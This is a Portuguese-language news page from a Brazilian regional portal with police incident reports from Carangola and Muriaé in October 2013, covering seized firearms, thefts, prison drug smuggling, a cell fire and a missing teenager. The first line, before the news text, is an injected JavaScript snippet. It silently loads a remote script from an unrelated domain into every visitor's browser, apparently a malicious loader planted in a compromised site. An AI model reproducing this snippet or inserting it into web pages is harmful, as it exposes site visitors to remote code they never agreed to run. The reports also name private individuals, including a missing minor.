;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Ocorrências Policiais em Destaque 75ª Cia PM - Carangola e Região - 23/10/2013 - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Ocorrências Policiais em Destaque 75ª Cia PM – Carangola e Região – 23/10/2013

pmbn

75ª CIA PM – CARANGOLA-MG.

 

PRODUTO SEM PROCEDÊNCIA RECOLHIDO EM CARANGOLA-MG.

            Em 21/10/2013 às 18h40min, no CÓRREGO DA PIRRAÇA, ZONA RURAL DE FERVEDOURO, militares durante a realização de uma operação patrulha de prevenção ativa em zona rural, diligenciaram a residência de GENY DIAS PEDROSA, 65 anos, a fim de apurar denúncia de que ele seria possuidor de uma arma de fogo. Após um diálogo com o denunciado ele assumiu que de fato possuía uma arma de fogo, e entregou um revólver marca Taurus, calibre .32, número 324834, desmuniciado e dentro de um coldre de couro com uma munição parecida com festim encaixada no porta munição. GENY informou que a arma não possuí registro, sendo o autor preso e conduzido juntamente com a arma à 4ª DRPC para as providências de praxe.

            Em 23/10/2013, as 01:50 horas, a policia militar durante patrulhamento pela rua Magalhães Queiroz, depararam com os indivíduos G.O.F., de 30 anos, vulgo camarão; W.O.F., de 28 anos, vulgo madeirinho; e o adolescente A.F.A., de 17 anos, vulgo gordo; todos contumazes em furtos/roubos e usuários de crack, transitando pelo logradouro citado com uma botija de gás de cozinha, sendo que em determinado momento fizeram contato com a testemunha  R.V.S., de 31 anos, funcionário de uma padaria, e ofereceram para venda o material descrito. eles procederam abordagem e ao questionarem os mesmos sobre a botija de gás, não souberam informar com exatidão a procedência de tal objeto, dizendo apenas que seria da genitora de um dos suspeitos, porem não provando em tempo hábil, citada afirmação. Assim, devido a não comprovação do material, foi realizado o recolhimento do mesmo, e orientaram os envolvidos para comparecerem a delegacia de polícia, para a retirada do material, caso comprovem sua procedência.

FURTO CONSUMADO EM RESIDÊNCIA EM CARANGOLA-MG.

Em 22/10/2013, as 14:55 horas, a policia militar compareceu ao córrego do galo, sitio paraíso, onde a solicitante L.M.P., de 66 anos, relatou que na tarde daquele dia, três indivíduos jovens, de cútis negra, dois deles aparentando ser menores, chegaram em seu sitio pedindo para colher jabuticabas; que um deles permaneceu nas arvores, outro pediu um copo d’água, momento em que o terceiro, sem romper obstáculos, adentrou em sua residencia de forma clandestina, enquanto o neto da solicitante tomava banho, e subtraiu do quarto dele, 01 (um) aparelho notebook, marca positivo, modelo sim +, cor preta, tela de 14″, sem bateria e carregador. Após consumar o furto eles evadiram a pé, e segundo a o adolescente V.M.V, de 17 anos, ao detectar o furto, saiu no encalco dos autores/infratores, chegando a visualizá-los momentaneamente. Durante o rastreamento dos autores, uma outra guarnição policial já estava com dois menores detidos pela pratica de furto, e que um deles, o adolescente A.F.O, de 15 anos, assumiu que também havia participado do furto do notebook naquela residencia rural, e ainda apontou o adolescente C.F.O., de 17 anos, como cúmplice, e o jovem D.O.M, de 22 anos, como o responsável por ingressar na residencia e subtrair para si o notebook. A equipe permaneceu em rastreamento ate localizar o adolescente menor C.F.O., de 17 anos, o qual confirmou a versão do menor A.F.O, de 15 anos, e disse que permaneceu nos pés de Jaboticaba, enquanto o jovem D.O.M, de 22 anos, subtraiu o notebook no interior da residencia. Assim os policiais deslocaram ate a residencia de D.O.M, de 22 anos, todavia, tanto o suposto autor, quanto o material subtraído não foram localizados. Os infratores apreendidos, acompanhados pela conselheira tutelar, foram encaminhados de imediato para a delegacia de plantão de Muriaé.

              76ª CIA PM – MURIAÉ-MG.

           

TRÁFICO ILICÍTO DE DROGAS EM MURIAÉ-MG.

            Em 22/10/13 ás 20h51min, na AV. LUCIANO RODRIGUES PAULA, Nº 600, LEBLON, MURIAÉ, militares compareceram à Penitenciária MANOEL MARTINS LISBOA JÚNIOR, onde foram informados pelo Agente Penitenciário, de 31 anos  que a senhora F.S.S., de 40 anos, estaria adentrando ao estabelecimento prisional em posse de substancias entorpecentes e que durante os encontros íntimos a mesma as levaria à seu amásio o detento M.J.T.S., o qual estaria comercializando estas substancias no interior daquele estabelecimento prisional, que para tanto a mesma vem utilizando a cavidade vaginal para ingresso da droga. Na presente data a autora estava com uma visita intima agendada, tendo os militares cumprido ordem judicial de conduzir  coercitivamente a autora até o HOSPITAL SÃO PAULO para ser submetida a exames e verificar a possível existência de substancias entorpecentes ocultadas nas cavidades do corpo. A autora a todo o momento negava tais denuncias, sendo que pelo hospital a mesma foi submetida a exame clínico pelo médico legista, devidamente testemunhado por agentes femininas, sendo encontrado na cavidade vaginal da conduzida um invólucro plástico de cor preta. F.S.S., de 40 anos informou que se tratava de “maconha”, a qual foi presa em flagrante e encaminhada 4ª DRPC para as providencias atinentes ao fato e o material foi apresentado a perícia técnica e através da perita criminal constatou a presença de 27 buchas de “maconha” no interior daquele invólucro.

DANO EM PENITENCIÁRIA OCORRIDO EM MURIAÉ-MG.

            Em 22/10/13 ás 17h23min, na AV. LUCIANO RODRIGUES PAULA, Nº 600, LEBLON, MURIAÉ, militares compareceram à Penitenciária MANOEL MARTINS LISBOA JÚNIOR, onde foram informados pelo Agente Penitenciário, de 31 anos, relatou que três detentos encarcerados da cela 12, sendo eles R.F.S., de 32 anos, I.B.R., de 22 anos e M.V.S., de 20 anos, colocaram fogo em três colchões, e varias roupas da unidade, roupas estas fornecidas pela unidade prisional. O mesmo disse que os referidos detentos estavam reivindicando dos agentes sobre uma água que estaria inundando a cela 12, e que no momento, não poderia atendê-los, motivo pelo qual, os detentos propiciaram tal dano. Disse ainda o agente penitenciário, quando estavam tentando apagar o fogo dentro da cela, juntamente com outros agentes, os detentos jogaram camisas molhadas e ate uma garrafa de plástico, “garrafa recolhido”, atingindo aqueles agentes nas costas, porem sem lesões. Foi dada voz de prisão em flagrante aos autores, e o fato relatado a autoridade policial.

POSSE ILEGAL DE ARMA DE FOGO EM MURIAÉ-MG.

            Em 22/10/2013, às 09h49min, na RUA DO MUTIRÃO, BAIRRO SÃO JOAQUIM, MURIAÉ, militares realizaram uma visita tranquilizadora na residência da Srª M.A.V., de 46 anos, a qual vinha sendo acompanhada pela equipe policial militar, no qual receberam denuncia de que o filho da envolvida, teria em sua posse uma arma de fogo.  Pelo local a autora fez a entrega de um revolver cal. 22 marca Rossi de nº 134738, carregado com 6 (seis) munições intactas, tendo o adolescente J.V.R.J., de 16 anos assumiu ser seu, tendo-o adquirido a aproximadamente 4 meses pela quantia de R$ 400,00. Perguntado sobre a origem da arma, permaneceu em silencio. O menor infrator, sua genitora, arma e munições apreendias foram encaminhadas para a 4ª DRPC para as demais providencias.

PESSOA DESAPARECIDA EM MURIAÉ-MG.

            Em 22/10/2013, às 15h30min, na RUA DR. ANTÔNIO ROGÉRIO DE CASTRO, Nº 33, BARRA, MURIAÉ, à solicitante ALESSANDRA RAQUEL DA SILVA, 30 anos, informou à PM que sua filha LARISSA ESTEFANI DA SILVA MONTEIRO, 14 anos, estava na casa da avo e saiu de casa na data de 21/10/2013 e até o presente momento não mais retornou para casa e que suspeita que sua filha, possa estar na companhia de DOUGLAS CAMERINI DA SILVA, 19 anos, pelo motivo de sua filha, ter postado em sua rede social, que tem um relacionamento amoroso com DOUGLAS CAMERINI DA SILVA, sendo deslocado até a residência de DOUGLAS, onde o mesmo informou que viu a desaparecida apenas na data de 19/10/2013. Na ocasião a desaparecida vestia short jeans escuro blusa de malha clara.

    ASSESSORIA DE COMUNICAÇÃO DO 47° BPM – MURIAÉ / MG

 

 

RUA JOSÉ DE FREITAS LIMA Nº47 – BAIRRO SAFIRA

MURIAÉ / MG

TELEFONE: 3696-3265.

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.